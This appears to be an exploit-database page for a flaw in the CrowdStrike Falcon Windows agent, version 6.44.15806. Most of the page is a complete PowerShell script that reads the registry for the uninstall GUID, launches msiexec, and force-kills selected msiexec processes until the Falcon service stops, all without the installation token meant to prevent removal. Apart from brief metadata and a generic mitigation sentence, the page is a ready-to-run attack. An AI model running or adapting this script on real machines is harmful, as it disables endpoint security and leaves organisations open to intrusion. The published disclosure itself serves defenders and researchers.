CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token

vendor:

Falcon AGENT

by:

Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team)

2.7

CVSS

LOW

Uninstall without Installation Token

284

CWE

Product Name: Falcon AGENT

Affected Version From: 6.44.15806

Affected Version To: 6.44.15806

Patch Exists: YES

Related CWE: CVE-2022-2841, CVE-2022-44721

CPE: a:crowdstrike:falcon_agent

Metasploit:

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=156579, https://www.infosecmatter.com/nessus-plugin-library/?id=56230, https://www.infosecmatter.com/nessus-plugin-library/?id=53764, https://www.infosecmatter.com/nessus-plugin-library/?id=156317, https://www.infosecmatter.com/nessus-plugin-library/?id=156278, https://www.infosecmatter.com/nessus-plugin-library/?id=87590, https://www.infosecmatter.com/nessus-plugin-library/?id=103647

Platforms Tested: All Windows versions

2022

CrowdStrike Falcon AGENT 6.44.15806 – Uninstall without Installation Token

This exploit allows an attacker to uninstall CrowdStrike Falcon AGENT 6.44.15806 without the need of an installation token. The exploit is based on CVE-2022-2841 and was modified by Deda Cloud Purple Team members to exploit a hotfixed release. The publication of CVE-2022-44721 is in progress.

Mitigation:

Organizations should ensure that they are running the latest version of CrowdStrike Falcon AGENT and that they have implemented the necessary security measures to protect their systems from unauthorized access.

Source

Exploit-DB raw data:

# Exploit Title: CrowdStrike Falcon AGENT  6.44.15806  - Uninstall without Installation Token 
# Date: 30/11/2022 
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) 
# Vendor Homepage: https://www.crowdstrike.com/ 
# Author Homepage: https://www.deda.cloud/ 
# Tested On: All Windows versions 
# Version: 6.44.15806 
# CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. 


$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"

foreach($obj in $InstalledSoftware){
    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))
    {
        $uninstall_uuid = $obj.Name.Split("\")[6]
    }
}

$g_msiexec_instances = New-Object System.Collections.ArrayList

Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"

while($true)
{
	if (get-process -Name "CSFalconService") {
		Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
			
			if (-Not $g_msiexec_instances.contains($_.id)){
				$g_msiexec_instances.Add($_.id)
				if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){
					Start-Sleep -Milliseconds 100
					Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]
					stop-process -Force -Id $g_msiexec_instances[-1]				
				}

			}
		
		}
	} else { 
		Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
		break
	}
}